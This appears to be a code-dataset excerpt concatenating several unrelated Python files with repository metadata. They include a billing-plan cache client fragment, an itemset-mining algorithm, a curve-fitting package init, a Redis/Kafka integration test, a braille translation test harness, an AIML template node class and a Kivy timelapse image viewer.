self.client.add_to_cache(cache_key, response)
if filters is not None:
for plan in response:
if (plan['name'] == filters['name'] or plan['plan_code'] == filters['plan_code']):
return plan
# if with_add_ons is not None:
# if with_add_ons in add_on_type:
# return None
else:
print("Returning from cache : " + cache_key)
return response
def get_plan(self, plan_code):
cache_key = 'plan_%s' % plan_code
response = self.client.get_from_cache(cache_key)
if response is None:
plan_by_plan_code = 'plans/%s' % plan_code
result = self.client.send_request("GET", plan_by_plan_code)
if type(result) is HTTPError:
result_bytes = result.response._content
result_dict = ast.literal_eval(result_bytes.decode('utf-8'))
return result_dict['message']
else:
response = result['plan']
self.client.add_to_cache(cache_key, response)
else:
print("Returning from cache : " + cache_key)
return response
def get_addons_for_plan(self,plan_code):
cache_key = 'plans'
addon_code_list = []
addon = Addon()
response = self.client.get_from_cache(cache_key)
if response is None:
list_of_plan_uri = 'plans'
result = self.client.send_request("GET", list_of_plan_uri)
response = result['plans']
self.client.add_to_cache(cache_key, response)
if plan_code is not None:
for each_plan in response:
if each_plan.get("addons"):
if each_plan.get('plan_code')== plan_code:
for each_addon_code in each_plan["addons"]:
addon_code_list.append(addon.get_addon(each_addon_code['addon_code']))
return addon_code_list
else:
print("Returning from cache : " + cache_key)
# Filter Plan
def get_price_by_plan_code(self, plan_code):
cache_key = 'plan_%s' % plan_code
response = self.client.get_from_cache(cache_key)
if response is None:
plan_by_plan_code = 'plans/%s' % plan_code
result = self.client.send_request("GET", plan_by_plan_code)
if type(result) is HTTPError:
result_bytes = result.response._content
result_dict = ast.literal_eval(result_bytes.decode('utf-8'))
return result_dict['message']
else:
response = result['plan']
self.client.add_to_cache(cache_key, response)
recurring_price = response['recurring_price']
return recurring_price
else:
print("Returning from cache : " + cache_key)
return response
| 2.1875 | 2 |
upcycle/cuda/__init__.py | samuelstanton/upcycle | 0 | 12799068 | from .try_cuda import try_cuda | 1.007813 | 1 |
socialposts/settings/__init__.py | renanbs/socialposts | 0 | 12799069 | from .production import *
try:
from.local import *
except:
pass
| 1.109375 | 1 |
pEFIM.py | pradeepppc/PSHUIM | 0 | 12799070 | from functools import cmp_to_key
from Transaction import Transaction
class pEFIM():
highUtilityItemsets = []
candidateCount = 0
utilityBinArrayLU = {}
utilityBinArraySU = {}
# a temporary buffer
temp = []
for i in range(5000):
temp.append(0)
def __init__(self, mapItemsToneighbors, minUtility, itemsToExplore, itemsToKeep, transactions, newNamesToOldNames, oldNamesToNewNames):
self.minUtil = minUtility
self.Neighbours = mapItemsToneighbors
self.itemsToExplore = itemsToExplore
self.itemsToKeep = itemsToKeep
self.transactions = transactions
self.newNamesToOldNames = newNamesToOldNames
self.oldNamesToNewNames = oldNamesToNewNames
def runAlgo(self):
# now we will sort the transactions according to proposed total order on transaction
self.sortDatabase(self.transactions)
self.backtrackingEFIM(self.transactions, self.itemsToKeep, self.itemsToExplore, 0)
return (1, self.highUtilityItemsets)
def backtrackingEFIM(self, transactionsOfP, itemsToKeep, itemsToExplore, prefixLength):
self.candidateCount += len(itemsToExplore)
for idx, e in enumerate(itemsToExplore):
# caluclate the transactions containing p U {e}
# at the same time project transactions to keep what appears after e
transactionsPe = []
# variable to caluclate the utility of Pe
utilityPe = 0
# merging transactions
previousTransaction = transactionsOfP[0]
consecutiveMergeCount = 0
for transaction in transactionsOfP:
items = transaction.getItems()
if e in items:
# if e was found in the transaction
positionE = items.index(e)
if transaction.getLastPosition() == positionE:
utilityPe += transaction.getUtilities()[positionE] + transaction.prefixUtility
else:
projectedTransaction = transaction.projectTransaction(positionE)
utilityPe += projectedTransaction.prefixUtility
if previousTransaction == transactionsOfP[0]:
# if it is the first transactoin
previousTransaction = projectedTransaction
elif self.is_equal(projectedTransaction, previousTransaction):
if consecutiveMergeCount == 0:
# if the first consecutive merge
items = previousTransaction.items[previousTransaction.offset:]
utilities = previousTransaction.utilities[previousTransaction.offset:]
itemsCount = len(items)
positionPrevious = 0
positionProjection = projectedTransaction.offset
while positionPrevious < itemsCount:
utilities[positionPrevious] += projectedTransaction.utilities[positionProjection]
positionPrevious += 1
positionProjection += 1
previousTransaction.prefixUtility += projectedTransaction.prefixUtility
sumUtilities = previousTransaction.prefixUtility
previousTransaction = Transaction(items, utilities, previousTransaction.transactionUtility + projectedTransaction.transactionUtility)
previousTransaction.prefixUtility = sumUtilities
else:
positionPrevious = 0
positionProjected = projectedTransaction.offset
itemsCount = len(previousTransaction.items)
while positionPrevious < itemsCount:
previousTransaction.utilities[positionPrevious] += projectedTransaction.utilities[
positionProjected]
positionPrevious += 1
positionProjected += 1
previousTransaction.transactionUtility += projectedTransaction.transactionUtility
previousTransaction.prefixUtility += projectedTransaction.prefixUtility
consecutiveMergeCount += 1
else:
transactionsPe.append(previousTransaction)
previousTransaction = projectedTransaction
consecutiveMergeCount = 0
transaction.offset = positionE
if previousTransaction != transactionsOfP[0]:
transactionsPe.append(previousTransaction)
self.temp[prefixLength] = self.newNamesToOldNames[e]
if utilityPe >= self.minUtil:
self.highUtilityItemsets.append((utilityPe , self.temp[:prefixLength + 1]))
# caluclate the set which is intersection of all the neighbours of items present in P U {e}
neighbourhoodList = self.caluclateNeighbourIntersection(prefixLength)
# caluclate the local utility and subtree utility
self.useUtilityBinArraysToCalculateUpperBounds(transactionsPe, idx, itemsToKeep, neighbourhoodList)
newItemsToKeep = []
newItemsToExplore = []
for l in range(idx + 1, len(itemsToKeep)):
itemk = itemsToKeep[l]
if self.utilityBinArraySU[itemk] >= self.minUtil:
if itemk in neighbourhoodList:
newItemsToExplore.append(itemk)
newItemsToKeep.append(itemk)
elif self.utilityBinArrayLU[itemk] >= self.minUtil:
if itemk in neighbourhoodList:
newItemsToKeep.append(itemk)
self.backtrackingEFIM(transactionsPe, newItemsToKeep, newItemsToExplore, prefixLength + 1)
def intersection(self, lst1, lst2):
# Use of hybrid method
temp = set(lst2)
lst3 = [value for value in lst1 if value in temp]
return lst3
def caluclateNeighbourIntersection(self, prefixLength):
intersectionList = []
if self.temp[0] in self.Neighbours:
intersectionList = self.Neighbours[self.temp[0]]
else:
return intersectionList
for i in range(1, prefixLength+1):
if self.temp[i] in self.Neighbours:
intersectionList = self.intersection(self.Neighbours[self.temp[i]], intersectionList)
finalIntersectionList = []
for item in intersectionList:
if item in self.oldNamesToNewNames:
finalIntersectionList.append(self.oldNamesToNewNames[item])
return finalIntersectionList
def useUtilityBinArraysToCalculateUpperBounds(self, transactionsPe, j, itemsToKeep, neighbourhoodList):
for i in range(j + 1, len(itemsToKeep)):
item = itemsToKeep[i]
self.utilityBinArrayLU[item] = 0
self.utilityBinArraySU[item] = 0
for transaction in transactionsPe:
length = len(transaction.getItems())
i = length - 1
while i >= transaction.offset:
item = transaction.getItems()[i]
if item in itemsToKeep:
remainingUtility = 0
if self.newNamesToOldNames[item] in self.Neighbours:
item_neighbours = self.Neighbours[self.newNamesToOldNames[item]]
for k in range(i, length):
transaction_item = transaction.getItems()[k]
if self.newNamesToOldNames[transaction_item] in item_neighbours and transaction_item in neighbourhoodList:
remainingUtility += transaction.getUtilities()[k]
remainingUtility += transaction.getUtilities()[i]
self.utilityBinArraySU[item] += remainingUtility + transaction.prefixUtility
self.utilityBinArrayLU[item] += transaction.transactionUtility + transaction.prefixUtility
i -= 1
def is_equal(self, transaction1, transaction2):
length1 = len(transaction1.items) - transaction1.offset
length2 = len(transaction2.items) - transaction2.offset
if length1 != length2:
return False
position1 = transaction1.offset
position2 = transaction2.offset
while position1 < len(transaction1.items):
if transaction1.items[position1] != transaction2.items[position2]:
return False
position1 += 1
position2 += 1
return True
def sortDatabase(self, transactions):
cmp_items = cmp_to_key(self.sort_transaction)
transactions.sort(key=cmp_items)
def sort_transaction(self, trans1, trans2):
trans1_items = trans1.getItems()
trans2_items = trans2.getItems()
pos1 = len(trans1_items) - 1
pos2 = len(trans2_items) - 1
if len(trans1_items) < len(trans2_items):
while pos1 >= 0:
sub = trans2_items[pos2] - trans1_items[pos1]
if sub != 0:
return sub
pos1 -= 1
pos2 -= 1
return -1
elif len(trans1_items) > len(trans2_items):
while pos2 >= 0:
sub = trans2_items[pos2] - trans1_items[pos1]
if sub != 0:
return sub
pos1 -= 1
pos2 -= 1
return 1
else:
while pos2 >= 0:
sub = trans2_items[pos2] - trans1_items[pos1]
if sub != 0:
return sub
pos1 -= 1
pos2 -= 1
return 0
| 2.703125 | 3 |
src/eddington/__init__.py | AssafZohar/eddington | 0 | 12799071 | """Core functionalities of the Eddington platform."""
from eddington.exceptions import (
EddingtonException,
FitDataColumnExistenceError,
FitDataColumnIndexError,
FitDataColumnsLengthError,
FitDataError,
FitDataInvalidFile,
FitDataInvalidFileSyntax,
FitFunctionLoadError,
FitFunctionRuntimeError,
)
from eddington.fit_data import FitData
from eddington.fit_function_class import FitFunction, fit_function
from eddington.fit_functions_registry import FitFunctionsRegistry
from eddington.fit_result import FitResult
from eddington.fit_functions_list import (
constant,
exponential,
hyperbolic,
linear,
parabolic,
polynom,
cos,
sin,
straight_power,
inverse_power,
)
from eddington.fitting import fit_to_data
__all__ = [
# Fit functions infrastructure
"FitFunction",
"fit_function",
"FitFunctionsRegistry",
# Fit functions
"constant",
"exponential",
"hyperbolic",
"linear",
"parabolic",
"polynom",
"cos",
"sin",
"straight_power",
"inverse_power",
# Fitting algorithm
"fit_to_data",
# Exceptions
"EddingtonException",
"FitFunctionRuntimeError",
"FitFunctionLoadError",
"FitDataError",
"FitDataColumnExistenceError",
"FitDataColumnIndexError",
"FitDataInvalidFile",
"FitDataColumnsLengthError",
"FitDataInvalidFileSyntax",
# Data structures
"FitData",
"FitResult",
]
| 2.015625 | 2 |
redis-monitor/tests/tests_online.py | abael/ScrapyCluster | 0 | 12799072 | <reponame>abael/ScrapyCluster<gh_stars>0
'''
Online integration tests
'''
import unittest
from unittest import TestCase
from mock import MagicMock
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from redis_monitor import RedisMonitor
from plugins.kafka_base_monitor import KafkaBaseMonitor
from kafka import KafkaClient, SimpleConsumer
import settings
import redis
import json
class CustomMonitor(KafkaBaseMonitor):
'''
Custom Monitor so we can run this test live without interference
'''
regex = "info-test:*"
def setup(self, settings):
KafkaBaseMonitor.setup(self, settings)
def handle(self, key, value):
return_dict = {
"info-test": value,
"appid": "someapp"
}
self._send_to_kafka(return_dict)
self.redis_conn.delete(key)
class TestRedisMonitor(TestCase):
maxDiff = None
queue_key = "link:istresearch.com:queue"
def setUp(self):
self.redis_monitor = RedisMonitor("localsettings.py")
self.redis_monitor.settings = self.redis_monitor.wrapper.load("localsettings.py")
self.redis_monitor.logger = MagicMock()
self.redis_monitor.settings['KAFKA_TOPIC_PREFIX'] = "demo_test"
self.redis_monitor.settings['STATS_TOTAL'] = False
self.redis_monitor.settings['STATS_PLUGINS'] = False
self.redis_monitor.settings['PLUGINS'] = {
'plugins.info_monitor.InfoMonitor': None,
'plugins.stop_monitor.StopMonitor': None,
'plugins.expire_monitor.ExpireMonitor': None,
'tests.tests_online.CustomMonitor': 100,
}
self.redis_monitor.redis_conn = redis.Redis(
host=self.redis_monitor.settings['REDIS_HOST'],
port=self.redis_monitor.settings['REDIS_PORT'])
self.redis_monitor._load_plugins()
self.redis_monitor.stats_dict = {}
self.kafka_conn = KafkaClient(self.redis_monitor.settings[
'KAFKA_HOSTS'])
self.kafka_conn.ensure_topic_exists("demo_test.outbound_firehose")
self.consumer = SimpleConsumer(
self.kafka_conn,
"demo-id",
"demo_test.outbound_firehose"
)
def test_process_item(self):
# we only want to go to the end now, not after this test is ran
self.consumer.seek(0, 2)
# set the info flag
key = "info-test:blah"
value = "ABC123"
self.redis_monitor.redis_conn.set(key, value)
# process the request
plugin = self.redis_monitor.plugins_dict.items()[0][1]
self.redis_monitor._process_plugin(plugin)
# ensure the key is gone
self.assertEquals(self.redis_monitor.redis_conn.get(key), None)
def test_sent_to_kafka(self):
success = {
u'info-test': "ABC123",
u"appid": u"someapp"
}
# ensure it was sent out to kafka
message_count = 0
for message in self.consumer.get_messages():
if message is None:
break
else:
the_dict = json.loads(message.message.value)
self.assertEquals(success, the_dict)
message_count += 1
self.assertEquals(message_count, 1)
if __name__ == '__main__':
unittest.main()
| 1.921875 | 2 |
third_party/liblouis/src/tests/harness/runHarness.py | zipated/src | 2,151 | 12799073 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Liblouis test harness
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
#
# Copyright (c) 2012, liblouis team, <NAME>.
"""Liblouis test harness:
Please see the liblouis documentation for information of how to add a new harness or more tests for your braille table.
@author: <NAME> <<EMAIL>>
@author: <NAME> <<EMAIL>>
@author: <NAME> <<EMAIL>>
"""
import json
import os
import sys
import traceback
from glob import iglob
from louis import translate, backTranslateString, hyphenate
from louis import noContractions, compbrlAtCursor, dotsIO, comp8Dots, pass1Only, compbrlLeftCursor, otherTrans, ucBrl
try:
from nose.plugins import Plugin
from nose import run
except ImportError:
sys.stderr.write("The harness tests require nose. Skipping...\n")
sys.exit(0)
### Nosetest plugin for controlling the output format. ###
class Reporter(Plugin):
name = 'reporter'
def __init__(self):
super(Reporter, self).__init__()
self.res = []
self.stream = None
def setOutputStream(self, stream):
# grab for own use
self.stream = stream
# return dummy stream
class dummy:
def write(self, *arg):
pass
def writeln(self, *arg):
pass
def flush(self):
pass
d = dummy()
return d
def addError(self, test, err):
exctype, value, tb = err
errMsg = ''.join(traceback.format_exception(exctype, value, tb))
self.res.append("--- Error: ---\n%s\n--- end ---\n" % errMsg)
def addFailure(self, test, err):
exctype, value, tb = err
#errMsg = ''.join(traceback.format_exception(exctype, value, None))
self.res.append("%s\n" % value)
def finalize(self, result):
failures=len(result.failures)
errors=len(result.errors)
total=result.testsRun
percent_string = " ({percent}% success)".format(percent=round((total-failures-errors+0.0)/total*100,2)) if total > 0 else ""
self.res.append("Ran {total} tests{percent_string}, with {failures} failures and {errors} errors.\n".format(total=total, percent_string=percent_string, failures=failures, errors=errors))
self.stream.write("\n".join(self.res))
### End of nosetest plugin for controlling the output format. ###
PY2 = sys.version_info[0] == 2
def u(a):
if PY2:
return a.encode("utf-8")
return a
modes = {
'noContractions': noContractions,
'compbrlAtCursor': compbrlAtCursor,
'dotsIO': dotsIO,
'comp8Dots': comp8Dots,
'pass1Only': pass1Only,
'compbrlLeftCursor': compbrlLeftCursor,
'otherTrans': otherTrans,
'ucBrl': ucBrl
}
def showCurPos(length, pos1, marker1="^", pos2=None, marker2="*"):
"""A helper function to make a string to show the position of the given cursor."""
display = [" "] *length
display[pos1] = marker1
if pos2:
display[pos2] = marker2
return "".join(display)
class BrailleTest():
def __init__(self, harnessName, tables, input, output, outputUniBrl=False, mode=0, cursorPos=None, brlCursorPos=None, testmode='translate', comment=[]):
self.harnessName = harnessName
self.tables = tables
if outputUniBrl:
self.tables.insert(0, 'unicode.dis')
self.input = input
self.expectedOutput = output
self.mode = mode if not mode else modes[mode]
self.cursorPos = cursorPos
self.expectedBrlCursorPos = brlCursorPos
self.comment = comment
self.testmode = testmode
def __str__(self):
return "%s" % self.harnessName
def hyphenateword(self, tables, word, mode):
# FIXME: liblouis currently crashes if we dont add space at end of the word, probably due to a counter running past the end of the string.
# medium/longterm this hack should be removed, and the root of the problem found/resolved.
hyphen_mask=hyphenate(tables, word+' ', mode)
# FIXME: why on python 2 do we need to remove the last item, and on python3 it is needed?
# i.e. in python2 word and hyphen_mask not of the same length.
if PY2:
return "".join( map(lambda a,b: "-"+a if b=='1' else a, word, hyphen_mask)[:-1] )
else:
return "".join( list(map(lambda a,b: "-"+a if b=='1' else a, word, hyphen_mask)) )
def check_translate(self):
if self.cursorPos is not None:
tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode, cursorPos=self.cursorPos)
else:
tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode)
template = "%-25s '%s'"
tBrlCurPosStr = showCurPos(len(tBrl), tBrlCurPos)
report = [
"--- Braille Difference Failure: %s ---" % self.__str__(),
template % ("comment:", "".join(self.comment)),
template % ("input:", self.input),
template % ("expected brl:", self.expectedOutput),
template % ("actual brl:", tBrl),
"--- end ---",
]
assert tBrl == self.expectedOutput, u("\n".join(report))
def check_backtranslate(self):
backtranslate_output = backTranslateString(self.tables, self.input, None, mode=self.mode)
template = "%-25s '%s'"
report = [
"--- Backtranslate failure: %s ---" % self.__str__(),
template % ("comment:", "".join(self.comment)),
template % ("input:", self.input),
template % ("expected text:", self.expectedOutput),
template % ("actual backtranslated text:", backtranslate_output),
"--- end ---",
]
assert backtranslate_output == self.expectedOutput, u("\n".join(report))
def check_cursor(self):
tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode, cursorPos=self.cursorPos)
template = "%-25s '%s'"
etBrlCurPosStr = showCurPos(len(tBrl), tBrlCurPos, pos2=self.expectedBrlCursorPos)
report = [
"--- Braille Cursor Difference Failure: %s ---" %self.__str__(),
template % ("comment:", "".join(self.comment)),
template % ("input:", self.input),
template % ("received brl:", tBrl),
template % ("BRLCursorAt %d expected %d:" %(tBrlCurPos, self.expectedBrlCursorPos),
etBrlCurPosStr),
"--- end ---"
]
assert tBrlCurPos == self.expectedBrlCursorPos, u("\n".join(report))
def check_hyphenate(self):
hyphenated_word = self.hyphenateword(self.tables, self.input, mode=self.mode)
template = "%-25s '%s'"
report = [
"--- Hyphenation failure: %s ---" % self.__str__(),
template % ("input:", self.input),
template % ("expected hyphenated word:", self.expectedOutput),
template % ("actual hyphenated word:", hyphenated_word),
"--- end ---",
]
assert hyphenated_word == self.expectedOutput, u("\n".join(report))
def test_allCases():
if 'HARNESS_DIR' in os.environ:
# we assume that if HARNESS_DIR is set that we are invoked from
# the Makefile, i.e. all the paths to the Python test files and
# the test tables are set correctly.
harness_dir = os.environ['HARNESS_DIR']
else:
# we are not invoked via the Makefile, i.e. we have to set up the
# paths (LOUIS_TABLEPATH) manually.
harness_dir = "."
# make sure local test braille tables are found
os.environ['LOUIS_TABLEPATH'] = '../tables,../../tables'
testfiles=[]
if len(sys.argv)>1:
# grab the test files from the arguments
for test_file in sys.argv[1:]:
testfiles.extend(iglob(os.path.join(harness_dir, test_file)))
else:
# Process all *_harness.txt files in the harness directory.
testfiles=iglob(os.path.join(harness_dir, '*_harness.txt'))
for harness in testfiles:
f = open(harness, 'r')
try:
harnessModule = json.load(f, encoding="UTF-8")
except ValueError as e:
raise ValueError("%s doesn't look like a harness file, %s" %(harness, e.message))
f.close()
tableList = []
if isinstance(harnessModule['tables'], list):
tableList.extend(harnessModule['tables'])
else:
tableList.append(harnessModule['tables'])
origflags = {'testmode':'translate'}
for section in harnessModule['tests']:
flags = origflags.copy()
flags.update(section.get('flags', {}))
for testData in section['data']:
test = flags.copy()
testTables = tableList[:]
test.update(testData)
bt = BrailleTest(harness, testTables, **test)
if test['testmode'] == 'translate':
yield bt.check_translate
if 'cursorPos' in test:
yield bt.check_cursor
if test['testmode'] == 'backtranslate':
yield bt.check_backtranslate
if test['testmode'] == 'hyphenate':
yield bt.check_hyphenate
if __name__ == '__main__':
result = run(addplugins=[Reporter()], argv=['-v', '--with-reporter', sys.argv[0]], defaultTest=__name__)
# FIXME: Ideally the harness tests should return the result of the
# tests. However since there is no way to mark a test as expected
# failure ATM we would have to disable a whole file of tests. So,
# for this release we will pretend all tests succeeded and will
# add a @expected_test feature for the next release. See also
# http://stackoverflow.com/questions/9613932/nose-plugin-for-expected-failures
result = True
sys.exit(0 if result else 1)
| 1.5625 | 2 |
parlai/agents/programr/parser/template/nodes/base.py | roholazandie/ParlAI | 0 | 12799074 | <filename>parlai/agents/programr/parser/template/nodes/base.py
import xml.etree.ElementTree as ET
# from parlai.agents.programr.utils.logging.ylogger import YLogger
import parlai.utils.logging as logging
from parlai.agents.programr.aiml_manager import AIMLManager
aiml_manager = AIMLManager.get_instance()
######################################################################################################################
#
class TemplateNode(object):
def __init__(self):
self._children = []
@property
def children(self):
return self._children
def append(self, child):
self._children.append(child)
def dump(self, tabs, output_func, eol, verbose):
self.output(tabs, output_func, eol, verbose)
def output(self, tabs, output_func, eol, verbose):
self.output_child(self, tabs, eol, output_func)
def output_child(self, node, tabs, eol, output_func):
for child in node.children:
output_func(self, "{0}{1}{2}".format(tabs, child.to_string(), eol))
self.output_child(child, tabs + "\t", eol, output_func)
def resolve_children_to_string(self, brain):
words = [child.resolve(brain) for child in self._children]
return aiml_manager.nlp.tokenizer.words_to_texts(words)
def resolve(self, brain):
try:
resolved = self.resolve_children_to_string(brain)
# YLogger.debug(brain, "[%s] resolved to [%s]", self.to_string(), resolved)
logging.debug(f"{self.to_string()} resolved to {resolved}")
return resolved
except Exception as excep:
# YLogger.exception(brain, "Failed to resolve", excep)
logging.error(f"Failed to resolve {excep}")
return ""
def to_string(self):
return "[NODE]"
def to_xml(self, brain):
return self.children_to_xml(brain)
def xml_tree(self, brain):
xml = "<template>"
xml += self.children_to_xml(brain)
xml += "</template>"
return ET.fromstring(xml)
def children_to_xml(self, brain):
xml = ""
first = True
for child in self.children:
if first is not True:
xml += " "
first = False
xml += child.to_xml(brain)
return xml
def parse_text(self, graph, text):
if text is not None:
string = text.strip()
if string:
words = graph.aiml_parser.brain.nlp.tokenizer.texts_to_words(string)
for word in words:
if word is not None and word:
word_class = graph.get_node_class_by_name('word')
word_node = word_class(word.strip())
self.children.append(word_node)
return True
return False
def get_text_from_element(self, element):
text = element.text
if text is not None:
text = text.strip()
return text
return None
def get_tail_from_element(self, element):
text = element.tail
if text is not None:
text = text.strip()
if text == "":
return None
return text
return None
def parse_template_node(self, graph, pattern):
head_text = self.get_text_from_element(pattern)
head_result = self.parse_text(graph, head_text)
found_sub = False
for sub_pattern in pattern:
graph.parse_tag_expression(sub_pattern, self)
tail_text = self.get_tail_from_element(sub_pattern)
self.parse_text(graph, tail_text)
found_sub = True
if head_result is False and found_sub is False:
if hasattr(pattern, '_end_line_number'):
# YLogger.warning(self, "No context in template tag at [line(%d), column(%d)]",
# pattern._end_line_number,
# pattern._end_column_number)
logging.warning(f"No context in template tag at [line({pattern._end_line_number}), column({pattern._end_line_number})]")
else:
# YLogger.warning(self, "No context in template tag")
logging.warning("No context in template tag")
#######################################################################################################
def add_default_star(self):
return False
def _parse_node(self, graph, expression):
expression_text = self.parse_text(graph, self.get_text_from_element(expression))
expression_children = False
for child in expression:
graph.parse_tag_expression(child, self)
self.parse_text(graph, self.get_tail_from_element(child))
expression_children = True
if expression_text is False and expression_children is False:
if self.add_default_star():
# YLogger.debug(self, "Node has no content (text or children), default to <star/>")
logging.debug("Node has no content (text or children), default to <star/>")
star_class = graph.get_node_class_by_name('star')
star_node = star_class()
self.append(star_node)
#######################################################################################################
def parse_attrib_value_as_word_node(self, graph, expression, attrib_name):
node = graph.get_base_node()
name_node = graph.get_word_node(expression.attrib[attrib_name])
node.append(name_node)
return node
def parse_children_as_word_node(self, graph, child):
node = graph.get_base_node()
node.parse_text(graph, self.get_text_from_element(child))
for sub_child in child:
graph.parse_tag_expression(sub_child, node)
node.parse_text(graph, self.get_text_from_element(child))
return node
def parse_expression(self, graph, expression):
raise NotImplementedError("Never call this directly, call the subclass instead!")
| 2.28125 | 2 |
Viewer/Viewer.py | FWMSH/timelapseViewer | 0 | 12799075 | '''
File: Viewer.py
Author: <NAME>. & <NAME>.
Date: 06/04/19
Description: This viewer can be run on a RaspberryPI, and pulls timelapse photos from a webserver hosted by Server.py
'''
from kivy.config import Config
import timelapseshare as tls
import PIL
import _thread
import time
import os
os.environ['KIVY_GL_BACKEND'] = 'gl' # FIXES A SEGFAULT ????
import urllib.request as urllib
#Config.set('graphics', 'fullscreen','auto')
Config.set('input', 'mouse', 'mouse,multitouch_on_demand')
#Config.set('kivy', 'exit_on_escape', '1')
from kivy.app import App
from kivy.core.window import Window
from kivy.uix.screenmanager import ScreenManager, Screen, NoTransition
from kivy.uix.label import Label
from kivy.uix.image import Image
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.button import Button
from kivy.graphics import Rectangle, Color
from kivy.clock import Clock
# ==========================
# Defaults
# ==========================
_SPEED = 1
_UPDATE_INTERVAL = 10 # every 10 seconds
_CLEAR_CACHE = False
_FILESERVER = "http://localhost:8000"
# ==========================
# Command-Line Arguments
# ==========================
import argparse
import platform
def dir_path(string):
if os.path.isdir(string):
return string
else:
raise
parser = argparse.ArgumentParser(description="Interactive Timelapse scroller")
parser.add_argument("-i", "--image_directory", type=dir_path, help="Sets the directory where the images are stored")
parser.add_argument("-pre", "--image_prefix", type=str, help="Sets the prefix of the image Eg. 'IMG'")
parser.add_argument("-post", "--image_postfix", type=str, help="Sets the postfix of the image Eg. '.jpg'")
parser.add_argument("-url", "--server_url", type=str, help="Sets the link to the server hosted by the webcam")
args = parser.parse_args()
if args.image_directory:
print("[*] SETTING IMAGE DIRECTORY : " + args.image_directory)
tls.setImageDirectory(args.image_directory)
if args.server_url:
print("[*] SETTING URL TO SERVER : " + args.server_url)
_FILESERVER = args.server_url
# ==========================
# Runtime Calculations
# ==========================
tls.updateStats()
def getImageDateTime(ID):
datafile = open(tls.getDataByID(ID))
teasis = datafile.read()
datafile.close()
return teasis
print("Highest: %d\nLowest: %d" % (tls.getMax(), tls.getMin()))
# ==========================
# WebServer stuff
# ==========================
def update_imgs(min_i, max_i):
global _CLEAR_CACHE
if tls._MIN > min_i and _CLEAR_CACHE:
for i in range(tls._MIN, min_i): # delete files in that range
try:
print("removing " + str(i))
os.remove(tls.getImageByID(i))
except:
print(str(i) + " doesn't exist!")
if tls._MAX < max_i:
for i in range(tls._MAX, max_i): # gets files in that range
try:
print("retrieving " + str(i))
urllib.urlretrieve(_FILESERVER + "/frame" + str(i) + ".jpg", tls.getImageByID(i))
except:
print(str(i) + " doesn't exist!")
tls.updateStatsManually(min_i, max_i)
def get_update():
try:
urllib.urlretrieve(_FILESERVER + "/index.txt", "index.txt")
indx = open("index.txt")
lines = indx.readlines()
mi = int(lines[0])
ma = int(lines[1])
update_imgs(mi, ma)
return True
except:
print("server down!")
return False
# ==========================
# Update thread
# ==========================
get_update()
def update_loop():
global _UPDATE_INTERVAL
while True:
time.sleep(_UPDATE_INTERVAL)
get_update()
_thread.start_new_thread(update_loop, ())
# ==========================
# User-Interface
# ==========================
class DebugScreen(Screen):
def __init__(self, *args, **kwargs):
super(DebugScreen, self).__init__(*args, **kwargs)
self.index = tls._MIN
master_layout = BoxLayout(orientation='vertical', size_hint=(1, 0.1))
self.title = Label(text='', font_size=80, size_hint=(1, 1))
master_layout.add_widget(self.title)
background_container = FloatLayout()
self.image = Image(source=tls.getImageByID(self.index), size_hint=(1, 0.9), nocache=True, allow_stretch=True)
background_container.add_widget(self.image)
background_container.add_widget(master_layout)
self.add_widget(background_container)
Clock.schedule_interval(self.updateScroll, 0.10)
Clock.schedule_interval(self.TLS_update, 1)
# Keyboard Input
self._keyboard = Window.request_keyboard(self._keyboard_closed, self)
self._keyboard.bind(on_key_down=self._on_keyboard_down, on_key_up=self._on_keyboard_up)
self.leftKey = False
self.rightKey = False
self.leftCount = 0
self.rightCount = 0
self.velo = 0
# Keyboard callbacks
def _keyboard_closed(self):
self._keyboard.unbind(on_key_down=self._on_keyboard_down)
self._keyboard = None
def _on_keyboard_down(self, keyboard, keycode, text, modifiers):
if keycode[1] == 'left':
self.leftKey = True
elif keycode[1] == 'right':
self.rightKey = True
return True
def _on_keyboard_up(self, keyboard, keycode):
if keycode[1] == 'left':
self.leftKey = False
elif keycode[1] == 'right':
self.rightKey = False
return True
# Mouse callbacks
def on_touch_down(self, touch):
if touch.is_mouse_scrolling:
if touch.button == 'scrolldown':
if self.index > tls._MIN:
self.index = self.index - _SPEED
elif touch.button == 'scrollup':
if self.index < tls._MAX:
self.index = self.index + _SPEED
GridLayout.on_touch_down(self, touch)
def updateScroll(self, *args):
app = App.get_running_app()
if self.leftKey:
if self.leftCount >= 4:
self.velo = -4
else:
self.velo = self.velo - 1
elif self.rightKey:
if self.rightCount >= 4:
self.velo = 4
else:
self.velo = self.velo + 1
else:
self.velo = 0
self.leftCount = 0
self.rightCount = 0
if (self.index+self.velo) > tls._MAX or (self.index+self.velo) < tls._MIN:
if (self.index+self.velo) > tls._MAX:
self.index = tls._MAX
elif (self.index+self.velo) < tls._MIN:
self.index = tls._MIN
else:
self.index = self.index+self.velo
#print("moving : " + str(self.index))
try:
self.title.text = tls.getTimeByID(self.index)
self.image.source = tls.getImageByID(self.index)
except:
pass
# Timelapse Share auto-updating stuff
def TLS_update(self, *args):
#tls.updateStats();
if self.index > tls._MAX:
self.index = tls._MAX
if self.index < tls._MIN:
self.index = tls._MIN
try:
self.title.text = tls.getTimeByID(self.index)
self.image.source = tls.getImageByID(self.index)
except:
pass
class ScreenManagement(ScreenManager):
def __init__(self, *args, **kwargs):
super(ScreenManagement, self).__init__(*args, **kwargs)
self.DBscreen = DebugScreen(name='scrollDebug')
self.add_widget(self.DBscreen)
self.current = 'scrollDebug'
class MainApp(App):
def build(self):
self.manager = ScreenManagement(transition=NoTransition())
return(self.manager)
# Start the app
MainApp().run()
| 2.421875 | 2 |
